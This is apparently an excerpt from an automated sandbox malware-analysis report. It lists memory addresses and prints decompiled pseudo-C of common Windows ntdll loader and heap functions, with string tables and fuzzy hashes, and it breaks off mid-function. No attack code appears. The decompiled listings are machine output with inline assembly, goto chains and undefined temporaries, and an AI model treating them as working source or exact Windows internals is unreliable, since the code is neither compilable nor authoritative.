0x029c1649
0x029c164c
0x029c1650
0x029c1656
0x029c165d
0x029c165e
0x029c165e
0x029c1650
0x029c15f3
0x02979af4
0x02979af7
0x02979afc
0x02979b00
0x02979b04
0x02979b08
0x02979b14
0x029799fe
0x02979a04
0x02979a07
0x00000000
0x02979a29
0x029c169c
0x029c16a0
0x029c16a5
0x029c16a9
0x029c16b5
0x029c16ba
0x029c16bc
0x029c16be
0x029c16c3
0x029c16c3
0x029c16bc
0x029c16c8
0x029c16cc
0x029c181b
0x029c181b
0x029c181e
0x029c181e
0x029c1821
0x029c1823
0x029c1826
0x029c1829
0x029c182c
0x029c182e
0x029c1688
0x029c1688
0x029c1689
0x029c168b
0x029c168c
0x029c168d
0x029c168f
0x029c1692
0x00000000
0x029c1692
0x029c1834
0x029c1836
0x00000000
0x00000000
0x029c183f
0x029c1842
0x029c1848
0x029c184a
0x029c1875
0x029c1875
0x029c1878
0x029c187b
0x029c187d
0x029c1880
0x029c1884
0x029c18a7
0x029c18a7
0x029c18aa
0x029c18ad
0x029c18b6
0x029c18bd
0x029c18c0
0x029c18c3
0x029c18c5
0x029c18c8
0x029c18ca
0x029c18ca
0x029c18cd
0x029c18cd
0x029c18c8
0x029c18d5
0x029c18da
0x029c18df
0x029c18e2
0x029c18e5
0x029c18e7
0x029c18ee
0x029c18f2
0x029c1912
0x029c1917
0x029c18f4
0x029c190a
0x029c190f
0x029c1925
0x029c192c
0x029c1931
0x029c193a
0x029c193e
0x029c1940
0x029c1947
0x029c1948
0x029c1948
0x029c193e
0x029c18e5
0x029c194f
0x029c1952
0x029c1956
0x029c195d
0x029c1961
0x029c196d
0x00000000
0x029c196d
0x029c188a
0x029c188f
0x029c1891
0x00000000
0x00000000
0x029c189d
0x00000000
0x029c189d
0x029c184c
0x029c1859
0x029c1859
0x029c185c
0x00000000
0x00000000
0x029c1851
0x029c1853
0x029c1855
0x029c1865
0x029c1865
0x029c1866
0x029c1868
0x029c1870
0x00000000
0x029c1870
0x029c1857
0x029c1857
0x029c185e
0x00000000
0x029c16d2
0x029c16d2
0x029c16d5
0x029c16d5
0x029c16d8
0x029c16da
0x029c16dd
0x029c16e0
0x029c16e3
0x029c16e5
0x029c1808
0x029c1808
0x029c1809
0x029c1812
0x029c1817
0x029c1817
0x00000000
0x029c1817
0x029c16eb
0x029c16ed
0x00000000
0x00000000
0x029c16f6
0x029c16f9
0x029c16ff
0x029c1701
0x029c172c
0x029c172c
0x029c172f
0x029c1732
0x029c1734
0x029c1737
0x029c173b
0x029c175e
0x029c175e
0x029c1761
0x029c1764
0x029c176d
0x029c1774
0x029c1777
0x029c177a
0x029c177c
0x029c177f
0x029c1781
0x029c1781
0x029c1784
0x029c1784
0x029c177f
0x029c178c
0x029c1791
0x029c1796
0x029c1799
0x029c179c
0x029c179e
0x029c17a5
0x029c17a9
0x029c17c9
0x029c17ce
0x029c17ab
0x029c17c1
0x029c17c6
0x029c17dc
0x029c17e3
0x029c17e8
0x029c17ee
0x029c17f1
0x029c17f5
0x029c17f7
0x029c17fe
0x029c17ff
0x029c17ff
0x029c17f5
0x029c179c
0x00000000
0x029c1764
0x029c1741
0x029c1746
0x029c1748
0x00000000
0x00000000
0x029c1754
0x00000000
0x029c1754
0x029c1703
0x029c1710
0x029c1710
0x029c1713
0x00000000
0x00000000
0x029c1708
0x029c170a
0x029c170c
0x029c171c
0x029c171c
0x029c171d
0x029c171f
0x029c1727
0x00000000
0x029c1727
0x029c170e
0x029c170e
0x029c1715
0x00000000
0x029c1715
0x029c16cc
0x02979a45
0x02979a45
0x02979a0e
0x02979a1c
0x02979a23
0x029c167e
0x029c167f
0x029c1681
0x029c1683
0x029c1684
0x00000000
0x029c1684
0x00000000
0x02979aad
0x02979aad
0x02979ab0
0x02979ab3
0x02979ab3
0x02979ab6
0x00000000
0x00000000
0x02979ab8
0x02979aba
0x02979abc
0x02979ac8
0x02979ac8
0x00000000
0x02979abe
0x02979abe
0x02979ac0
0x00000000
0x02979ac0
0x02979abc
0x02979ad2
0x00000000
0x02979ad2
0x02979aab

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 029C1572, 029C1639, 029C17DE, 029C1927
HEAP: , xrefs: 029C155D, 029C1624, 029C17C9, 029C1912
HEAP[%wZ]: , xrefs: 029C1550, 029C1617, 029C17BC, 029C1905

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 2277c2782cc5f7d3f7070d28088f6dabec54054e098cc6fb50b2bacd5f9a27ce
Instruction ID: 2df1c5c7411d00bd2bf59304541abf1bdb631bf7c04817680f2f3c0146dcb08b
Opcode Fuzzy Hash: 2277c2782cc5f7d3f7070d28088f6dabec54054e098cc6fb50b2bacd5f9a27ce
Instruction Fuzzy Hash: DC220770A042419FEB19DF28C494B7AB7FAEF85708F24856DE84A8B382D731D881CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02968794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E02968794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0296934A() != 0) {
								_t159 = E029DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x2a45780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E029D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x2a45780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0296849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E02968999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E02968999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x2a45c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x2a45c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E02972280(_t92, 0x2a486cc);
															_t94 = E02A29DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E029861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x2a45c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E02968A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x2a45c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x2a45c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0299F380(_t136, 0x2931184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E02972280(_t108, 0x2a486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E029861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E02A29D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0296FFB0(_t118, _t156, 0x2a486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E02999A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x02968799
0x0296879d
0x029687a1
0x029687a3
0x029687a8
0x029687c3
0x029687c3
0x029687c8
0x029687d1
0x029687d4
0x029687d8
0x029687e5
0x029687ec
0x029b9bfe
0x029b9c00
0x029b9c02
0x029b9c08
0x029b9c0d
0x029b9c0f
0x029b9c14
0x029b9c2d
0x029b9c32
0x029b9c37
0x029b9c3a
0x029b9c3c
0x029b9c42
0x029b9c42
0x029b9c3c
0x029b9c02
0x029687da
0x029687df
0x029687e3
0x00000000
0x00000000
0x029687e3
0x029687f2
0x00000000
0x029687fb
0x029687fd
0x029687fe
0x0296880e
0x0296880f
0x02968810
0x02968814
0x0296881a
0x0296881c
0x0296881f
0x02968821
0x02968822
0x02968824
0x02968826
0x0296882c
0x0296882e
0x029b9c48
0x029b9c48
0x02968834
0x02968834
0x02968837
0x00000000
0x00000000
0x02968837
0x0296882e
0x0296883d
0x02968840
0x02968843
0x02968846
0x02968849
0x0296884c
0x0296884e
0x02968850
0x02968852
0x02968854
0x02968857
0x029688b4
0x029688b6
0x029688b6
0x02968859
0x02968859
0x02968859
0x02968861
0x02968866
0x0296886a
0x0296893d
0x02968941
0x00000000
0x02968947
0x02968947
0x0296894a
0x0296894c
0x00000000
0x02968952
0x02968955
0x0296895a
0x0296895d
0x0296895d
0x0296895f
0x02968961
0x02968961
0x02968968
0x00000000
0x00000000
0x0296896a
0x0296896b
0x0296896e
0x00000000
0x02968970
0x02968970
0x02968970
0x02968970
0x02968972
0x02968972
0x02968974
0x00000000
0x0296897a
0x0296897a
0x0296897d
0x00000000
0x02968983
0x029b9c65
0x029b9c6d
0x029b9c72
0x029b9c75
0x029b9c75
0x029b9c82
0x029b9c86
0x029b9c87
0x029b9c88
0x029b9c89
0x029b9c8c
0x029b9c90
0x029b9c95
0x029b9c97
0x029b9ca0
0x029b9ca3
0x029b9ca9
0x029b9ca9
0x00000000
0x029b9ca9
0x029b9ca3
0x00000000
0x029b9c97
0x0296897d
0x00000000
0x02968974
0x02968988
0x02968992
0x02968996
0x00000000
0x02968996
0x0296894c
0x00000000
0x02968870
0x0296887b
0x0296887d
0x0296887f
0x02968881
0x02968884
0x02968884
0x02968886
0x02968889
0x0296888c
0x0296888e
0x02968891
0x02968891
0x02968898
0x00000000
0x00000000
0x0296889a
0x0296889b
0x0296889e
0x00000000
0x00000000
0x029688a0
0x029688a8
0x029688b0
0x029688b2
0x029688d3
0x029688d5
0x00000000
0x029688d7
0x029688db
0x029688dc
0x029688e0
0x029688e8
0x029688ee
0x029688f0
0x029688f3
0x029688fc
0x02968901
0x02968906
0x0296890c
0x0296890c
0x0296890f
0x02968916
0x02968917
0x02968918
0x02968919
0x0296891a
0x0296891f
0x02968921
0x029b9c52
0x029b9c55
0x029b9c5b
0x029b9cac
0x029b9cc0
0x029b9cc0
0x029b9c55
0x02968927
0x02968927
0x0296892f
0x02968933
0x00000000
0x029688f5
0x029688f5
0x00000000
0x029688f7
0x029688f7
0x029688fa
0x00000000
0x00000000
0x00000000
0x00000000
0x029688fa
0x029688f5
0x029688f3
0x00000000
0x029688d5
0x00000000
0x029688b2
0x029688c9
0x00000000
0x029688c9
0x0296887f
0x0296886a
0x02968857
0x02968852
0x029688bf
0x029688bf
0x029687aa
0x029687ad
0x029687ae
0x029687b4
0x029687b5
0x029687b6
0x029687b8
0x029687bd
0x029687c1
0x029687f4
0x029687fa
0x00000000
0x00000000
0x00000000
0x029687c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 029B9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 029B9C18
minkernel\ntdll\ldrsnap.c, xrefs: 029B9C28

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 3414f662318b933fdc9213df357bc0f9e7f848b90f76f5ca4f370079f874aef9
Instruction ID: 856186ca07aadca38a7d3c014e47b260ede97db24d104a80d90dbd4688a38757
Opcode Fuzzy Hash: 3414f662318b933fdc9213df357bc0f9e7f848b90f76f5ca4f370079f874aef9
Instruction Fuzzy Hash: 34910671A00216EFEF28DF59C489ABAB3FAFF84314B544569D915AB240DB30ED09CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0298AC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0298AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E029AD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x2a48a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E029996E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E02A03C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E029996E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0295B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E02A114FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E02977D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E02A11411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E02977D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E02A11411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x0298ac85
0x0298ac88
0x0298ac8a
0x0298ac8d
0x0298ac91
0x0298ac99
0x0298ac9c
0x029c9f57
0x029c9f5b
0x029c9f60
0x029c9f60
0x0298aca8
0x0298acae
0x0298acda
0x0298acde
0x0298ace8
0x0298aceb
0x0298acee
0x00000000
0x0298acee
0x0298acf6
0x0298acb0
0x0298acb0
0x0298acbb
0x0298acbd
0x0298acc0
0x0298acc5
0x0298adae
0x0298adb4
0x0298adb4
0x0298acd4
0x0298acd8
0x0298acf9
0x0298acff
0x0298ad04
0x0298ad08
0x0298ad09
0x0298ad10
0x0298ad12
0x0298ad18
0x029c9f6f
0x029c9f74
0x029c9f76
0x029c9f7c
0x029c9f84
0x029c9f88
0x029c9f89
0x029c9f90
0x029c9f90
0x029c9f76
0x0298ad1e
0x0298ad24
0x0298ad26
0x029ca097
0x029ca09b
0x029ca0ba
0x029ca0bf
0x029ca09d
0x029ca0b2
0x029ca0b7
0x029ca0c5
0x029ca0c8
0x029ca0cb
0x029ca0d2
0x00000000
0x0298ad2c
0x0298ad2c
0x0298ad2f
0x0298ad34
0x0298ad36
0x029c9f97
0x029c9f9a
0x00000000
0x00000000
0x029c9fa9
0x0298ad3e
0x0298ad3e
0x0298ad41
0x029c9fb3
0x029c9fb9
0x029c9fc0
0x029c9fd0
0x029c9fd0
0x029c9fc0
0x0298ad4a
0x0298ad50
0x0298ad5c
0x0298ad62
0x0298ad68
0x0298ad6b
0x0298ad6d
0x029c9fda
0x029c9fdd
0x00000000
0x00000000
0x029c9fec
0x00000000
0x0298ad73
0x0298ad73
0x0298ad73
0x0298ad75
0x0298ad75
0x0298ad78
0x029c9ff6
0x029c9ffc
0x029ca003
0x029ca00e
0x029ca010
0x029ca01b
0x029ca01b
0x029ca01b
0x029ca038
0x029ca038
0x029ca003
0x0298ad84
0x0298ad89
0x0298ad8c
0x0298ad8e
0x029ca042
0x029ca045
0x00000000
0x00000000
0x029ca054
0x00000000
0x0298ad94
0x0298ad94
0x0298ad94
0x0298ad96
0x0298ad96
0x0298ad99
0x029ca063
0x029ca065
0x029ca070
0x029ca070
0x029ca070
0x029ca08d
0x029ca08d
0x0298ada4
0x0298ada6
0x00000000
0x0298ada6
0x0298ad8e
0x0298ad6d
0x0298ad3c
0x0298ad3c
0x00000000
0x0298ad3c
0x00000000
0x00000000
0x00000000
0x0298acd8

Strings

HEAP: , xrefs: 029CA0BA
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 029CA0CD
HEAP[%wZ]: , xrefs: 029CA0AD

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: ae2b51ba30cac3ef4272cbe8b24a8a8bdc631ef9dacf7307c58ae122f0f0c105
Instruction ID: 2896fd629f4dc8967d0d6e96dd8bdbd006de7fd576575df64064651efff30e91
Opcode Fuzzy Hash: ae2b51ba30cac3ef4272cbe8b24a8a8bdc631ef9dacf7307c58ae122f0f0c105
Instruction Fuzzy Hash: 81812631200684EFE726DFA8C894FA9BBF8FF05714F1845AAE541CB691E774E940CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02967E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E02967E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0296CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0295C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x2a45780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E029D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x2a45780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E02977D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E02977D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E029D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E02977D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
